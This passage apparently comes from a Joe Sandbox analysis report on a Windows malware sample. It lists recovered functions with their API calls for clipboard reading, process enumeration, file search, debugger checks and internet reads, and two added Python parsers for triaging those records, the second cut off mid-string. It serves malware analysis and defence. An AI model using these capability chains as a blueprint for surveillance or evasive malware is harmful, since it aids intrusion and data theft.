                                                                                                                                                                   • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: ERCP$VUUU$VUUU$VUUU$XjH
                                                                                                                                                                  • API String ID: 0-2872873767
                                                                                                                                                                  • Opcode ID: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                                                                                                                                                  • Instruction ID: d175e7d0ae6fb3d700f9da8fb6b70819649eb02c4ceaf458d011f7582104736e
                                                                                                                                                                  • Opcode Fuzzy Hash: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                                                                                                                                                  • Instruction Fuzzy Hash: D772D871A042198BEF24CF58C8807AEB7F1EB42314F25829BD859A7380D7799DC5CF5A
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                   • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Process$CurrentTerminate
                                                                                                                                                                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN$T
                                                                                                                                                                  • API String ID: 2429186680-740461495
                                                                                                                                                                  • Opcode ID: b72cfe7de07cb9d0978f61b6edeb2304fb673773e5d036d49eb9d98452444512
                                                                                                                                                                  • Instruction ID: 4e7ec58ed90b4ed80869aa83cdae9d8c721e1562ec3e7372f020a8cacf339105
                                                                                                                                                                  • Opcode Fuzzy Hash: b72cfe7de07cb9d0978f61b6edeb2304fb673773e5d036d49eb9d98452444512
                                                                                                                                                                  • Instruction Fuzzy Hash: DD528176E0026A8BDF14CFA8D4403EEB7B1FF94310F95816BD815AB381D7789946CB98
                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32 ref: 00475608
                                                                                                                                                                  • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00475618
                                                                                                                                                                  • Process32NextW.KERNEL32(00000000,?), ref: 004756AB
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 004756BA
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                   • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                   • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 420147892-0
                                                                                                                                                                  • Opcode ID: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                                                                                                                                                  • Instruction ID: 52239f647ae7113ca4c6e3167181772f82882466072c53a1302db900a9aecbbd
                                                                                                                                                                  • Opcode Fuzzy Hash: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                                                                                                                                                  • Instruction Fuzzy Hash: B3518671900618ABDB10DF55CD85FDE77B8EF44704F1084AAF509AB282DA75AF84CF68
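The function summaries above list raw API sequences with hex arguments: socket.WSOCK32(00000002,00000002,00000011,...) after an inet_addr subcall, the IsWindowVisible/GetForegroundWindow/IsIconic/IsZoomed chain, CoCreateInstance next to a ".lnk" string, and the CreateToolhelp32Snapshot/Process32FirstW/Process32NextW walk. Reading the raw values back into SDK constants is the step an analyst repeats for every summary, so the following Python does it mechanically. It is an added example, not part of the Joe Sandbox report and not Joe Sandbox signature logic: it parses API lines in the report's format, decodes the socket() and clipboard-format constants (values taken from the Windows SDK headers), and maps each summary to a behaviour label. The rule set and labels are the editor's own assumptions, and the sample input is constructed by copying the API lines of the summaries above plus the OpenClipboard/GetClipboardData routine listed further down the report.

```python
import re

# One "APIs" line of a Joe Sandbox function summary, e.g.
#   • socket.WSOCK32(00000002,00000002,00000011,?,00000000), ref: 0047666F
#   • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
API_LINE = re.compile(
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})"
)

# Argument constants from the Windows SDK headers (winsock2.h, winuser.h).
ADDRESS_FAMILIES = {2: "AF_INET", 23: "AF_INET6"}
SOCKET_TYPES = {1: "SOCK_STREAM", 2: "SOCK_DGRAM", 3: "SOCK_RAW"}
PROTOCOLS = {0: "IPPROTO_IP", 6: "IPPROTO_TCP", 17: "IPPROTO_UDP"}
CLIPBOARD_FORMATS = {1: "CF_TEXT", 13: "CF_UNICODETEXT"}

# Behaviour rules (assumed for this example, not Joe Sandbox signatures):
# every API in the set must appear in the function's call list.
CAPABILITY_RULES = {
    "enumerates running processes (Toolhelp32 snapshot walk)":
        {"CreateToolhelp32Snapshot", "Process32FirstW", "Process32NextW"},
    "checks foreground window state (visible / enabled / minimised / maximised)":
        {"GetForegroundWindow", "IsWindowVisible", "IsIconic", "IsZoomed"},
    "reads clipboard contents":
        {"OpenClipboard", "IsClipboardFormatAvailable", "GetClipboardData"},
    "creates a socket": {"socket"},
    "instantiates a COM object": {"CoInitialize", "CoCreateInstance"},
}

def parse_api_calls(lines):
    """Return one dict per API line: name, module, raw hex args, call site, subcall flag."""
    calls = []
    for line in lines:
        m = API_LINE.search(line)
        if not m:
            continue
        raw = m.group("args")
        calls.append({
            "name": m.group("name"),
            "module": m.group("module"),
            "args": [a.strip() for a in raw.split(",")] if raw else [],
            "ref": int(m.group("ref"), 16),
            "subcall": "subcall" in line,
        })
    return calls

def _symbolic(table, value):
    """Map a hex argument to its SDK constant; '?' means the sandbox could not resolve it."""
    if value == "?":
        return "?"
    return table.get(int(value, 16), "0x%X" % int(value, 16))

def decode_socket_args(args):
    """socket(af, type, protocol): decode the three leading arguments."""
    af, kind, proto = (args + ["?", "?", "?"])[:3]
    return (_symbolic(ADDRESS_FAMILIES, af), _symbolic(SOCKET_TYPES, kind),
            _symbolic(PROTOCOLS, proto))

def classify_function(lines, strings=()):
    """Match one function summary against CAPABILITY_RULES, then refine the
    generic hits with argument values and the summary's listed strings."""
    calls = parse_api_calls(lines)
    names = {c["name"] for c in calls}
    findings = []
    for label, required in CAPABILITY_RULES.items():
        if not required <= names:
            continue
        if label == "creates a socket":
            sock = next(c for c in calls if c["name"] == "socket")
            label = "creates a socket: %s/%s/%s" % decode_socket_args(sock["args"])
        elif label == "reads clipboard contents":
            fmts = sorted({_symbolic(CLIPBOARD_FORMATS, c["args"][0])
                           for c in calls if c["name"] == "GetClipboardData" and c["args"]})
            label = "reads clipboard contents (%s)" % ", ".join(fmts)
        elif label == "instantiates a COM object" and ".lnk" in strings:
            label = "instantiates a COM object and references a .lnk path"
        findings.append(label)
    return findings

# Constructed sample input: API lines copied from the report's function summaries.
UDP_SOCKET_FUNC = [
    "• Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249",
    "• socket.WSOCK32(00000002,00000002,00000011,?,00000000), ref: 0047666F",
    "• WSAGetLastError.WSOCK32(00000000), ref: 00476692",
]
WINDOW_STATE_FUNC = [
    "• IsWindowVisible.USER32 ref: 0047A368",
    "• IsWindowEnabled.USER32 ref: 0047A378",
    "• GetForegroundWindow.USER32(?,?,?,00000001), ref: 0047A385",
    "• IsIconic.USER32 ref: 0047A393",
    "• IsZoomed.USER32 ref: 0047A3A1",
]
COM_LNK_FUNC = [
    "• CoInitialize.OLE32(00000000), ref: 00478442",
    "• CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0047845B",
]
PROCESS_WALK_FUNC = [
    "• CreateToolhelp32Snapshot.KERNEL32 ref: 00475608",
    "• Process32FirstW.KERNEL32(00000000,0000022C), ref: 00475618",
    "• Process32NextW.KERNEL32(00000000,?), ref: 004756AB",
]
CLIPBOARD_FUNC = [
    "• OpenClipboard.USER32(?), ref: 0046DCE7",
    "• IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5",
    "• GetClipboardData.USER32(0000000D), ref: 0046DD01",
    "• GetClipboardData.USER32(00000001), ref: 0046DD8D",
]
```

Calling classify_function(UDP_SOCKET_FUNC) yields "creates a socket: AF_INET/SOCK_DGRAM/IPPROTO_UDP", which is the reading of 00000002,00000002,00000011 that the summary leaves to the analyst; passing the summary's "String ID" values as strings lets the COM rule pick up the ".lnk" reference. A rule fires only when every listed API is present, so a summary that calls GetForegroundWindow alone is not labelled as a window-state check.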
                                                                                                                                                                  APIs
                                                                                                                                                                  • OpenClipboard.USER32(?), ref: 0046DCE7
                                                                                                                                                                  • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                                                                                                                                                  • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                                                                                                                                                  • CloseClipboard.USER32 ref: 0046DD0D
                                                                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                                                                                                                                                  • CloseClipboard.USER32 ref: 0046DD41
                                                                                                                                                                  • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                                                                                                                                                  • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                                                                                                                                                  • CloseClipboard.USER32 ref: 0046DD99
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 15083398-0
                                                                                                                                                                  • Opcode ID: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                                                                                                                                                                  • Instruction ID: df02eb04a95629b292fb88db9571ebb8a4b5ed240788a0c572d8156b6d3d2bc0
                                                                                                                                                                  • Opcode Fuzzy Hash: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                                                                                                                                                                  • Instruction Fuzzy Hash: 1A0128326042416BC311BBB99C8596E7B64EF4A324F04097FF984A72C1EB74A912C3A9
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: @oH$\$^$h
                                                                                                                                                                  • API String ID: 0-3701065813
                                                                                                                                                                  • Opcode ID: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
                                                                                                                                                                  • Instruction ID: 796dcd1322dc9123c5f4e5533c800aedaabe8dca19c5b95ba0af32eff2573e22
                                                                                                                                                                  • Opcode Fuzzy Hash: 988809b36a944a9929e300e154a4cfc85b4d4f50dea7e6e4a67b5f519bc2876c
                                                                                                                                                                  • Instruction Fuzzy Hash: 4242E170E04249CFEB14CF69C8806AEBBF2FF85304F2481AAD856AB351D7399946CF55
                                                                                                                                                                  APIs
                                                                                                                                                                  • mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 0043335F
                                                                                                                                                                  • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043338B
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: mouse_event
                                                                                                                                                                  • String ID: DOWN
                                                                                                                                                                  • API String ID: 2434400541-711622031
                                                                                                                                                                  • Opcode ID: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                                                                                                                                                  • Instruction ID: c5effa3e7e2998e6ee15a8e10ce6e2e5d36a5fc043d4170c53cc9f091e4fe068
                                                                                                                                                                  • Opcode Fuzzy Hash: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                                                                                                                                                  • Instruction Fuzzy Hash: 78F0A0726846103AF80026947C02EFB334C9B26767F004023FE0CD1280EA59290557BD
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 004182CB: EnterCriticalSection.KERNEL32(004115F6,004115F6,?,00417986,0000000D,?,004115F6,?,00401BAC,?,?,?), ref: 004182F5
                                                                                                                                                                  • GetTimeZoneInformation.KERNEL32(00496E80,00000000,00000000,00000000,00000000,00000000,0048D360,0000002C,0041EA73,0048D380,00000008,004156E4,?,?,?), ref: 0041E48D
                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00496E84,?,?,0000003F,00000000,?), ref: 0041E50B
                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00496ED8,000000FF,?,0000003F,00000000,?), ref: 0041E53F
                                                                                                                                                                    • Part of subcall function 00413748: RtlFreeHeap.NTDLL(00000000,00000000,?,00417A5A,00000000), ref: 0041375E
                                                                                                                                                                    • Part of subcall function 00413748: GetLastError.KERNEL32(00000000,?,00417A5A,00000000), ref: 00413770
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ByteCharMultiWide$CriticalEnterErrorFreeHeapInformationLastSectionTimeZone
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1184061189-0
                                                                                                                                                                  • Opcode ID: 06363b2cab1afc51bffd968e0dea48356ae4f4d141c4ef8976a29c5ecb2b1261
                                                                                                                                                                  • Instruction ID: 6e93d5efaa4a90a82b68055889133adc72b509ee617d9465a01728c8ae8b60d1
                                                                                                                                                                  • Opcode Fuzzy Hash: 06363b2cab1afc51bffd968e0dea48356ae4f4d141c4ef8976a29c5ecb2b1261
                                                                                                                                                                  • Instruction Fuzzy Hash: D391C3B5900255AFDB109FA6E8819DEBBB5BF19354B54003FE940A7251D7389D82CB2C
                                                                                                                                                                  APIs
                                                                                                                                                                  • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045CB1F
                                                                                                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 0045CB7C
                                                                                                                                                                  • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CBAB
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Find$File$CloseFirstNext
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3541575487-0
                                                                                                                                                                  • Opcode ID: 6055aee70b5594e04af3cc97ca5df33eab635db205e1b0d95dafa989526a10af
                                                                                                                                                                  • Instruction ID: f333144462bda28c064cc07c1e05bb1389ec512a64b809c533c1c3d7cc497df0
                                                                                                                                                                  • Opcode Fuzzy Hash: 6055aee70b5594e04af3cc97ca5df33eab635db205e1b0d95dafa989526a10af
                                                                                                                                                                  • Instruction Fuzzy Hash: 6741DF716003019FC710EF69D881A9BB3E5FF89315F108A6EE9698B351DB75F844CB94
                                                                                                                                                                  APIs
                                                                                                                                                                  • IsDebuggerPresent.KERNEL32(?,00000001,00000000), ref: 00417E94
                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00000001,00000000), ref: 00417E9E
                                                                                                                                                                  • UnhandledExceptionFilter.KERNEL32(00401884,?,00000001,00000000), ref: 00417EAB
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: ExceptionFilterUnhandled$DebuggerPresent
• String ID:
• API String ID: 3906539128-0
• Opcode ID: 42f93e18c6965526c6f2e22395c6ba628ee7d052eafe2f53a52ba4c41b503b79
• Instruction ID: 31b9ab21867ad1b842961dd6fee13a806953e064714b7494ebc73d94b307db22
• Opcode Fuzzy Hash: 42f93e18c6965526c6f2e22395c6ba628ee7d052eafe2f53a52ba4c41b503b79
• Instruction Fuzzy Hash: 0931E6B49013189BCB25DF25E9887DDB7B8BF08314F2045EEE41DA6291D7785B858F48
APIs
• GetFileAttributesW.KERNEL32(?,00000000), ref: 004339C7
• FindFirstFileW.KERNEL32(?,?), ref: 004339D8
• FindClose.KERNEL32(00000000), ref: 004339EB
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: FileFind$AttributesCloseFirst
• String ID:
• API String ID: 48322524-0
• Opcode ID: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
• Instruction ID: b419dbaef297d354eb99830e4178f101d1a7f75c7260f3cbf0392e7d05c3e8e7
• Opcode Fuzzy Hash: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
• Instruction Fuzzy Hash: 22E092328145189B8610AA78AC0D4EE779CDF0A236F100B56FE38C21E0D7B49A9047DA
APIs
• InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0044231E
• InternetReadFile.WININET(?,00000000,?,?), ref: 00442356
  • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
Memory Dump Source
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
Similarity
• API ID: Internet$AvailableDataErrorFileLastQueryRead
• String ID:
• API String ID: 901099227-0
• Opcode ID: a84f1234d60d0bfd4ae1c18445e4b4f4e353c9d3ff10812a8b0aa1e25e6dfae4
• Instruction ID: 2cb050104b41b6b223ad4d4b8d529f91c68f3ac810c45c6f1fc1690b5501c343
• Opcode Fuzzy Hash: a84f1234d60d0bfd4ae1c18445e4b4f4e353c9d3ff10812a8b0aa1e25e6dfae4
• Instruction Fuzzy Hash: B32174752002047BFB10DE26DC41FAB73A8EB54765F40C42BFE059A141D6B8E5458BA5
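The records above list, per recovered function, the imported API calls with their call-site addresses ("ref:"), calls the report attributes to a subcall, and the Similarity identifiers Joe Sandbox derives from them. When triaging a sample it is useful to collapse this listing into one row per function (API chain plus a capability label), so the file-enumeration function, the WinINet download loop and the anti-debug check can be compared at a glance. The following is an added example, not part of the Joe Sandbox report or its tooling: a parser for these records. The sample input is constructed from three records on this page with the repeated Memory Dump Source metadata trimmed; the capability tags and the API-to-tag mapping are this example's own assumption, not a Joe Sandbox feature.

```python
"""Turn Joe Sandbox per-function records into a triage table (added example,
not Joe Sandbox tooling; SAMPLE is constructed from this page and
CAPABILITY_APIS is this example's own assumed mapping)."""
from __future__ import annotations
import re
from dataclasses import dataclass, field

# Constructed sample: three records copied from this page, with the repeated
# "Memory Dump Source" metadata trimmed to its first line.
SAMPLE = """\
APIs
• GetFileAttributesW.KERNEL32(?,00000000), ref: 004339C7
• FindFirstFileW.KERNEL32(?,?), ref: 004339D8
• FindClose.KERNEL32(00000000), ref: 004339EB
• Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: FileFind$AttributesCloseFirst
• Opcode ID: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
• Instruction Fuzzy Hash: 22E092328145189B8610AA78AC0D4EE779CDF0A236F100B56FE38C21E0D7B49A9047DA
APIs
• InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0044231E
• InternetReadFile.WININET(?,00000000,?,?), ref: 00442356
  • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
Similarity
• API ID: Internet$AvailableDataErrorFileLastQueryRead
• Opcode ID: a84f1234d60d0bfd4ae1c18445e4b4f4e353c9d3ff10812a8b0aa1e25e6dfae4
• Instruction Fuzzy Hash: B32174752002047BFB10DE26DC41FAB73A8EB54765F40C42BFE059A141D6B8E5458BA5
APIs
• DefDlgProcW.USER32(?,?,?,?), ref: 0047EA9E
Similarity
• API ID: Proc
• Opcode ID: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
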